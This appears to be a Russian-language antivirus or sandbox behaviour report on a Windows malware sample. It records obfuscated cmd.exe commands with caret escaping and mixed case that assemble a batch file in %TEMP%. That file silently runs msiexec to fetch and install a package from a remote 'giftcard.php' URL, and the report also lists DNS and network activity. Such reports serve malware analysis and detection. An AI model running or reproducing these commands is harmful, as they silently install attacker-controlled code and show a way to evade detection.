Техническая информация
- '<SYSTEM32>\cmd.exe' /c EChO|SE^t /p=" M^siexe">%temp%\alpaca.bat&EcHo|s^et /p="c " >>%temp%\alpaca.bat&EcHo|s^et /p="^/i" >>%temp%\alpaca.bat&EcHo|s^et /p=" http^:^/^/^latamdcs.com^/giftcard.^php ">>%temp%\alp...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1952
- %TEMP%\alpaca.bat
- %TEMP%\954507.cvr
- 'la###dcs.com':80
- 'la###dcs.com':443
- http://la###dcs.com/giftcard.php
- 'la###dcs.com':443
- DNS ASK la###dcs.com
- '<SYSTEM32>\cmd.exe' /c EChO|SE^t /p=" M^siexe">%temp%\alpaca.bat&EcHo|s^et /p="c " >>%temp%\alpaca.bat&EcHo|s^et /p="^/i" >>%temp%\alpaca.bat&EcHo|s^et /p=" http^:^/^/^latamdcs.com^/giftcard.^php ">>%temp%\alp...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /S /D /c" EChO"
- '<SYSTEM32>\cmd.exe' /S /D /c" SEt /p=" M^siexe" 1>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="c " 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="^/i" 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p=" http^:^/^/^latamdcs.com^/giftcard.^php " 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p=" ^/q &exit" 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\msiexec.exe' /ihttp://latamdcs.com/giftcard.php /q